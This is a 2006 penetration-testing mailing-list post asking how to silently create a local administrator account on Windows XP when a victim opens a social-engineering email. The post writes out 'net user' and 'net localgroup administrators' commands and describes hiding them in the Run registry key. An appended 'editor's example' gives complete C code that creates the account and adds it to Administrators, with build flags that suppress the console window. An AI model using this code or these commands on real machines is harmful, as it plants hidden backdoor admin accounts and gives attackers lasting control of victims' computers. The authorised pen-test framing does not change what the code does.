Penetration Testing mailing list archives
add a local admin user without a pop-up ?
From: me <deros68 () yahoo com>
Date: Fri, 1 Dec 2006 15:44:09 -0800 (PST)
We are conducting a pen test that allows social engineering emails to be sent out that may allow us to take over the user who opens one of them. I created an email hack but am now wondering how to add a local admin user WITHOUT HAVING A DOS PROMPT POP UP WHEN THE EMAIL IS OPENED.

I cannot transport any files (of any sort - no wscript file or vbs or any file!!) to the victim and I am limited to the native XP commands and processes that are on the victim machine. If I catch a victim (catch & release) I will be able to reach the victim machine with native XP means (net use, nc to ports, etc.). The victim then gets scolded about opening inappropriate emails... The victim is almost always an administrator or power user, so almost any command or process can be used.

I tried many, many variants of invoking the "Cmd.exe" shell, but so far it always creates a momentary DOS screen pop-up. I tried many variants similar to the below:

    CMD.EXE /Q /C net user testx password /add

or

    start /B /wait cmd /Q /C c:\windows\system32\net.exe user testx password /add

Pop-ups in either case.

I have used rundll32.exe in the past to avoid pop-ups (in most cases), so I tried:

    rundll32.exe netapi32.dll,NetUserAdd (%COMPUTERNAME%,1,(NEWUSER,PASSWORD),0)

(wrapped) I tried many variants of the above, but I always get a pop-up "An Exception occurred while trying to run netapi32.dll..".

OK, I plugged netapi32.dll into Olly and saw the dll entry NetUserAdd takes 4 parms - but the 3rd parm is an LPBYTE pointer to the input buffer. I wonder if rundll32.exe can construct such a pointer for me?

Using only the programs and API calls available from what is essentially an XP DOS shell, does anyone have a better way to do this without creating a DOS pop-up?

I have already figured out how to write the "net user Username PSWD /add" & "net localgroup administrators Username /add" cmds to the registry (the Run key) without creating a pop-up! (Silently..)

However, the problem with the above is that it requires a logon/logoff or re-boot to occur before the user is added. Thus my quest for a silent (no pop-up) but immediate means to do this. Since the email interface can call a winapi, I may have to try to call netapi32.dll/NetUserAdd. I hope that I do not have to do that; the test may be over before I can decipher the correct syntax between my email system and the STDCALL Winapi.

Thanks
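Editor's added example (not code from the poster or any reply): what NetUserAdd actually expects in its third parameter, and why the rundll32.exe attempt above throws an exception. rundll32 always invokes its target with a fixed signature, `void CALLBACK Entry(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)`, so NetUserAdd(servername, level, buf, parm_err) receives a window handle, a module handle, a narrow ANSI string and an int instead of a wide server name, a level, a pointer to a USER_INFO_1 structure and a DWORD pointer. No command-line syntax can make rundll32 build that structure. The code below builds it the way the API requires (usri1_priv must be USER_PRIV_USER and UF_SCRIPT must be set), adds the account, and puts it in the local Administrators group. It does not satisfy the poster's "no files" constraint: it is a native program, which on Windows should be linked as a GUI-subsystem executable so that no console window is created, e.g. `cl addadmin.c /link /SUBSYSTEM:WINDOWS /ENTRY:mainCRTStartup netapi32.lib`. On non-Windows hosts only the structure-building logic compiles so it can be checked; the account name "testx"/"password" mirror the post, the group name "Administrators" assumes an English install (the group is localised; resolving it from SID S-1-5-32-544 would be more robust), and the function names are mine.

```c
/* Added example: building the USER_INFO_1 buffer NetUserAdd needs, then
 * adding the account to the local Administrators group. Not from the
 * original post. On Windows it performs the add; elsewhere only the
 * structure logic is compiled (stand-in typedefs below) so it can be tested. */
#include <stddef.h>
#include <string.h>
#include <wchar.h>

#ifdef _WIN32
#  include <windows.h>
#  include <lm.h>
#  pragma comment(lib, "netapi32.lib")
#else
/* Stand-ins for the Windows definitions so the buffer logic compiles elsewhere. */
typedef unsigned long DWORD;
typedef wchar_t *LPWSTR;
#  define USER_PRIV_USER        1
#  define UF_SCRIPT             0x0001
#  define UF_DONT_EXPIRE_PASSWD 0x10000
#  define LM20_UNLEN            20
typedef struct _USER_INFO_1 {
    LPWSTR usri1_name;
    LPWSTR usri1_password;
    DWORD  usri1_password_age;
    DWORD  usri1_priv;
    LPWSTR usri1_home_dir;
    LPWSTR usri1_comment;
    DWORD  usri1_flags;
    LPWSTR usri1_script_path;
} USER_INFO_1;
#endif

/* Fill a USER_INFO_1 for a new local account.
 * Returns 0 on success, -1 on a NULL argument or a name that is empty or
 * longer than LM20_UNLEN (20) characters, the limit for SAM account names
 * that "net user" also enforces. */
int build_user_info(USER_INFO_1 *ui, wchar_t *name, wchar_t *password)
{
    if (ui == NULL || name == NULL || password == NULL) return -1;
    if (wcslen(name) == 0 || wcslen(name) > LM20_UNLEN) return -1;
    memset(ui, 0, sizeof *ui);
    ui->usri1_name         = name;
    ui->usri1_password     = password;
    ui->usri1_password_age = 0;                      /* ignored by NetUserAdd */
    ui->usri1_priv         = USER_PRIV_USER;         /* the only value NetUserAdd accepts */
    ui->usri1_flags        = UF_SCRIPT | UF_DONT_EXPIRE_PASSWD; /* UF_SCRIPT is mandatory */
    return 0;
}

/* Self-check: 1 if build_user_info accepts the input and produces a buffer
 * with the mandatory priv/flags values, 0 otherwise. */
int user_info_ok(wchar_t *name, wchar_t *password)
{
    USER_INFO_1 ui;
    if (build_user_info(&ui, name, password) != 0) return 0;
    return ui.usri1_priv == USER_PRIV_USER
        && (ui.usri1_flags & UF_SCRIPT) != 0
        && ui.usri1_password_age == 0;
}

/* Create the account on the local machine (servername NULL) and add it to
 * the local Administrators group. Returns 0 (NERR_Success) on success, the
 * NERR_/Win32 status on failure, or -1 if the buffer could not be built or
 * the code is running on a non-Windows host. */
long add_local_admin(wchar_t *name, wchar_t *password)
{
    USER_INFO_1 ui;
    if (build_user_info(&ui, name, password) != 0) return -1;
#ifdef _WIN32
    {
        DWORD parm_err = 0;
        LOCALGROUP_MEMBERS_INFO_3 member;
        NET_API_STATUS st = NetUserAdd(NULL, 1, (LPBYTE)&ui, &parm_err);
        if (st != NERR_Success) return (long)st;
        member.lgrmi3_domainandname = name;
        /* "Administrators" assumed (English install); the name is localised. */
        return (long)NetLocalGroupAddMembers(NULL, L"Administrators", 3,
                                             (LPBYTE)&member, 1);
    }
#else
    return -1;
#endif
}

int main(void)
{
    /* Account name and password mirror the ones in the post. */
    return add_local_admin(L"testx", L"password") == 0 ? 0 : 1;
}
```

The structure is what the poster saw in OllyDbg as the LPBYTE argument: a pointer to USER_INFO_1, with two fields the API insists on. Because rundll32's calling convention is fixed, the only ways to make this call from the victim machine are a native binary like this one or a script host that can marshal the call, both of which require something to be delivered to the host.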
Current thread:
- add a local admin user without a pop-up ? me (Dec 03)
- RE: add a local admin user without a pop-up ? Jason M Frey (Dec 04)
- Re: add a local admin user without a pop-up ? Lee Lawson (Dec 04)
- Re: add a local admin user without a pop-up ? killy (Dec 07)